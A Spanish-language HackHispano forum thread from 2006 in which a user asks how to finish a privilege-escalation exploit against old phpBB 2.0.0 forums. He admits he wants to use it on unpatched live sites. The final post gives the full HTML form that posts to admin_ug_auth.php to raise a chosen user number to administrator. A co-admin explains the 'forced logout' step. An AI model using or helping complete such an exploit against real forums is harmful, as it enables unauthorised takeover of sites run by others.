Resultados 1 al 10 de 10

Tema: ¿Logout por fuerza?

  1. #1 ¿Logout por fuerza? 
    Iniciado
    Fecha de ingreso
    Nov 2006
    Mensajes
    5
    Descargas
    0
    Uploads
    0
    Hace MUCHO tiempo atrás (2002), en este foro, se hizo una prueba donde Tse Tse subió un foro donde uno tenía que crear un usuario y conseguir que éste tenga permisos de Administrador. Sin embargo, es que hace poco tiempo descubrí esta prueba y a la vez conseguí el exploit que se usó esa vez. El problema es el siguiente: Tse Tse resumió como se podía entrar al foro de manera fácil, pero dijo esto:

    5. Como estamos dentro de foro (hemos hecho login) tenemos que darle a logout por fuerza, sino no funcionará y nos saldrá un mensaje que no tenemos permisos.
    No sé lo que es "dar un logout por fuerza", ya que cuando intento hacer la última parte me sale lo que presagiaba Tse Tse en el punto 6.

    Información
    Usted no esta autorizado para administrar este Foro

    Necesito que me digan como "dar logout por fuerza", ya que ese paso no logro comprenderlo y no puedo finalizar mi tarea

    GRACIAS AMIGOS!

    P.D: Para los que participaron en ese reto, les dejo la pagina para que se acuerden http://www.hackhispano.com/foro/arch...hp/t-5332.html
    Última edición por m0rdk; 19-11-2006 a las 10:24
    Citar  
     

  2. #2  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.703
    Descargas
    30
    Uploads
    8
    Hombre, pero esa versión es la phpBB 2.0.0.
    Actualmente ya trabajan con la version 2.0.21
    Citar  
     

  3. #3  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.450
    Descargas
    11
    Uploads
    0
    ademas... no creo que a LUK le agrade que andes haciendo prubas en este foro
    Última edición por Cypress; 19-11-2006 a las 22:35
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  4. #4  
    Iniciado
    Fecha de ingreso
    Nov 2006
    Mensajes
    5
    Descargas
    0
    Uploads
    0
    Yo no estoi haciendo pruebas en este foro. ¿Para qué?, si varias dudas ya las he resuelto gracias a la buena voluntad de los que han posteado en el foro.

    Sólo necesito saber que es "dar logout por fuerza" y listo. Nunca dije que estaba haciendo pruebas con este foro. Sólo encontré un foro antiguo con esa falla, y quedo pegado en "dar logout por fuerza".

    Gracias.
    Última edición por m0rdk; 19-11-2006 a las 20:15
    Citar  
     

  5. #5  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.703
    Descargas
    30
    Uploads
    8
    Cita Iniciado por m0rdk
    Sólo encontré un foro antiguo con esa falla, y quedo pegado en "dar logout por fuerza".Gracias.
    A eso me refería. ¿Todavía hay foros sin parchear por ahi?
    Citar  
     

  6. #6  
    Iniciado
    Fecha de ingreso
    Nov 2006
    Mensajes
    5
    Descargas
    0
    Uploads
    0
    Cita Iniciado por clarinetista
    A eso me refería. ¿Todavía hay foros sin parchear por ahi?
    Claro amigo, todavía hay algunos foros sin parchear, aunque no son muchos.

    Pero para explotar la falla, necesito saber qué es "dar logout por fuerza". ¿Alguien me puede ayudar en ese punto? por favor
    Citar  
     

  7. #7  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.703
    Descargas
    30
    Uploads
    8
    Creo que Tse-Tse se referia a que "a la fuerza", es decir, por c__jones, hay que hacer un logout, o por lo menos eso me suena de esa vulnerabilidad a mi (de eso hace ya tiempo )
    Citar  
     

  8. #8  
    Iniciado
    Fecha de ingreso
    Nov 2006
    Mensajes
    5
    Descargas
    0
    Uploads
    0
    Cita Iniciado por clarinetista
    Creo que Tse-Tse se referia a que "a la fuerza", es decir, por c__jones, hay que hacer un logout, o por lo menos eso me suena de esa vulnerabilidad a mi (de eso hace ya tiempo )
    Amigo, no logré comprender mucho tu mensaje. Si me puedes explicar mejor, te lo agradecería mucho.

    Gracias!!
    Citar  
     

  9. #9  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.703
    Descargas
    30
    Uploads
    8
    Que no es un método de hacer logout, sino que obligatoriamente tienes que desloguearte.
    Citar  
     

  10. #10  
    Iniciado
    Fecha de ingreso
    Nov 2006
    Mensajes
    5
    Descargas
    0
    Uploads
    0
    Cita Iniciado por clarinetista
    Que no es un método de hacer logout, sino que obligatoriamente tienes que desloguearte.
    Una última consulta. Cuando aplico el exploit y me deslogueo me sale la casilla de usuario y contraseña para ingresar al foro.

    Algo está mal?

    <html>
    <head>
    </head>
    <body>
    <form method="post"
    action="http://xxx.xxx.xxx.xxx/reccon/phpBB2/admin/admin_ug_auth.php">
    User Level: <select name="userlevel">
    <option value="admin">Administrador</option>
    <option value="user">User</option></select>
    <input type="hidden" name="private[1]" value="0">
    <input type="hidden" name="moderator[1]" value="0">
    <input type="hidden" name="mode" value="user">
    <input type="hidden" name="adv" value="">
    User Number: <input type="text" name="u" size="5">
    <input type="submit" name="submit" value="Submit">
    </form>
    </body>
    </html>

    A mi parecer el exploit está bien. ¿Qué estaré haciendo mal? Ayudaaa

    Última edición por m0rdk; 22-11-2006 a las 00:11
    Citar  
     

Temas similares

  1. Fuerza bruta.
    Por Ybb en el foro INGENIERIA INVERSA
    Respuestas: 2
    Último mensaje: 20-09-2006, 12:47
  2. Fuerza bruta
    Por Ybb en el foro INGENIERIA INVERSA
    Respuestas: 2
    Último mensaje: 18-09-2006, 11:01
  3. SSH fuerza bruta
    Por mldavid44 en el foro INTRUSION
    Respuestas: 2
    Último mensaje: 24-03-2004, 17:44
  4. Fuerza Bruta
    Por guizmo en el foro GENERAL
    Respuestas: 7
    Último mensaje: 30-05-2003, 04:34

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •